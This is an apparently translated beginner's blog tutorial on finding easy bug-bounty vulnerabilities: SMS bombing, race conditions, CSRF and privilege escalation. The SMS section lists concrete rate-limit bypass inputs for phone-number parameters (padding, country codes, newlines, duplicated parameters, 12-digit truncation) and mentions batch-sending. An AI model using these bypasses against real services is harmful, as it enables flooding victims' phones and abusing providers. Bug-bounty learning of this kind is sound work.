As a beginner, how to quickly submit the first valid vulnerability in SRC (Security Response Center) and earn a bounty is a concern for many newcomers. This article will recommend several common and relatively easy-to-exploit vulnerability types, and provide detailed exploration ideas and methods to help you get started quickly. As the saying goes, "Unable to find high-risk vulnerabilities, use low-risk vulnerabilities to make up for it."
SMS Bombing Vulnerability#
What is an SMS bombing vulnerability?#
An SMS bombing vulnerability refers to attackers using the SMS interface of certain platforms or services to send a large number of repetitive or junk messages to the victim's mobile phone, causing the victim's phone to be flooded with messages and even rendering it unusable.
How to exploit an SMS bombing vulnerability?#
- Target selection: Choose websites that provide SMS verification services, such as registration, login, password recovery, etc.
- Interface analysis: Analyze the requests and responses of the SMS interface using tools like Burp Suite to identify the API for sending SMS.
- Send tests: Attempt to send multiple SMS messages and observe if there are any restrictions on the frequency or quantity of messages.
When reviewing the SMS bombing, I feel that it's better not to start with concurrency, as it may lead to phone number blocking. It's better to bypass it first.
Bypass techniques#
- Bypass by adding spaces, 86, 086, 0086, +86, 0, 00, /r, /n, and special characters before and after the phone number parameter.
%20 +86 187111111
1871111%20 1871111 1871111\n
phone=1871111,1871111,187
phone=18711&phone=187111
- Modify cookies, variables, returns.
- 138888888889, a 12-digit number, is truncated to the first 11 digits by the SMS gateway, causing SMS bombing.
- Use encodings that can be parsed, such as URL encoding, to bypass.
Here is a real case:
Then write a dictionary to send packets in batches and successfully receive multiple verification codes.
Concurrency Vulnerability#
What is a concurrency vulnerability?#
A concurrency vulnerability refers to a situation where a system fails to handle concurrency correctly when processing multiple simultaneous requests, resulting in data inconsistency or system abnormalities.
How to exploit a concurrency vulnerability?#
Everything can be concurrent.
Concurrency testing mainly focuses on scenarios such as sign-in, daily points redemption, likes, and likes on comments, testing whether the server can respond multiple times to concurrent requests.
If we want to enhance the harm of concurrency vulnerabilities, we must link them to money or make the vendor feel that they can exploit this to achieve the effect of taking advantage of the system. At this time, our concurrency vulnerability can earn a high bounty.
Recommended tools#
Burpsuite Turbo Intruder plugin (the god of concurrency)
Please search the specific usage methods on the internet.
CSRF (Cross-Site Request Forgery)#
What is a CSRF vulnerability?#
A CSRF vulnerability refers to attackers forging user requests to induce users to perform unexpected operations while authenticated without their knowledge.
How to exploit a CSRF vulnerability?#
- Find critical operations: Choose operations that require user authentication, such as password modification, form submission, etc.
- Construct malicious requests: Construct an HTML form or script containing malicious operations and inadvertently induce users to click.
- Verify the vulnerability: Access the malicious link while logged in and verify if the expected operation can be executed.
Recommended tools#
- CSRF PoC Generator in Burp Suite
Privilege Escalation Vulnerability#
What is a privilege escalation vulnerability?#
A privilege escalation vulnerability refers to ordinary users executing operations that can only be performed by administrators or other privileged users without the corresponding permissions.
How to exploit a privilege escalation vulnerability?#
- Analyze privilege control: Understand the privilege control mechanism in the system and identify the differences in permissions between different roles.
- Simulate low-privileged users: Use the identity of a low-privileged user to attempt to access high-privileged functions or resources.
- Manual and automated testing: Manually modify parameters in requests, such as user ID and role ID, to verify if unauthorized access is possible.
Recommended tools#
- xia_yue plugin in Burp Suite
Conclusion#
By mastering the exploration techniques for common vulnerabilities such as SMS bombing, concurrency, CSRF, and privilege escalation, beginners can find their first vulnerability more quickly. In the actual exploration process, in addition to theoretical knowledge, a lot of practice and continuous experience summarization are also required. I hope this article is helpful to you and wish you success in your exploration journey in SRC!